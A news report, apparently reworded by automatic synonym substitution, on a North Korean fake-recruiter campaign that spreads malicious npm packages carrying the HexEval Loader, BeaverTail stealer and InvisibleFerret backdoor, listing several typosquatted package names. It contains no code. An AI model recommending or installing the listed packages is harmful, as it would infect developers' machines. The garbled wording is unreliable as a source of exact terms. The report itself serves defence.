A brand new wave of North Korea’s ‘Contagious Interview’ marketing campaign is focusing on job seekers with malicious npm packages that infect dev’s units with infostealers and backdoors.
The packages have been found by Socket Risk Analysis, which studies they load the BeaverTail info-stealer and InvisibleFerret backdoor on victims’ machines, two well-documented payloads related to DPRK actors.
The newest assault wave makes use of 35 malicious packages submitted to npm via 24 accounts. The packages have been downloaded over 4,000 instances in complete, and 6 of them stay obtainable on the time of writing.
A number of of the 35 malicious npm packages typosquat or mimic well-known and trusted libraries, making them particularly harmful.
Notable examples of these are:
- react-plaid-sdk, reactbootstraps
- vite-plugin-next-refresh, vite-loader-svg
- node-orm-mongoose
- jsonpacks, jsonspecific
- chalk-config
- node-loggers, *-logger
- framer-motion-ext
- nextjs-insight
- struct-logger, logbin-nodejs
Victims, usually software program engineers and builders, are led to obtain these packages by North Korean operatives posing as recruiters, requesting job candidates to work on a check mission.
“Posing as recruiters on LinkedIn, the North Korean risk actors ship coding “assignments” to builders and job seekers by way of Google Docs, embed these malicious packages inside the mission, and sometimes strain candidates to run the code outdoors containerized environments whereas screen-sharing,” explains Socket.
Supply: Socket
The assignments are hosted on Bitbucket and disguised as professional exams, however in actuality, they set off an an infection chain that drops a number of payloads on the goal’s laptop.
The primary stage is HexEval Loader, hidden within the npm packages, which fingerprints the host, contacts the risk actor’s command-and-control (C2) server, and makes use of ‘eval()’ to fetch and execute the second stage payload, BeaverTail.
BeaverTail is a multi-platform info-stealer and malware loader that steals browser knowledge, together with cookies and cryptocurrency wallets, and masses the third stage, InvisibleFerret.
InvisibleFerret is a cross-platform persistent backdoor delivered as a ZIP file, giving the attackers deeper, ongoing entry to the sufferer’s system with distant management, file theft, and screen-shooting capabilities.
Lastly, the attackers drop a cross-platform (Home windows, macOS, Linux) keylogger instrument that hooks into low-level enter occasions and performs real-time surveillance and knowledge exfiltration.
This keylogger was solely related to one of many npm aliases used within the marketing campaign, so it may be deployed solely on choose high-value targets.
.jpg)
Supply: Socket
Software program builders approached with profitable distant job gives ought to deal with these invites with warning and at all times run unknown code in containers or digital machines as an alternative of executing it on their OS.
Final March, North Korean hackers Lazarus have been caught submitting one other set of malicious packages on npm, so that is an ongoing threat.
Patching used to imply advanced scripts, lengthy hours, and countless hearth drills. Not anymore.
On this new information, Tines breaks down how fashionable IT orgs are leveling up with automation. Patch quicker, cut back overhead, and deal with strategic work — no advanced scripts required.
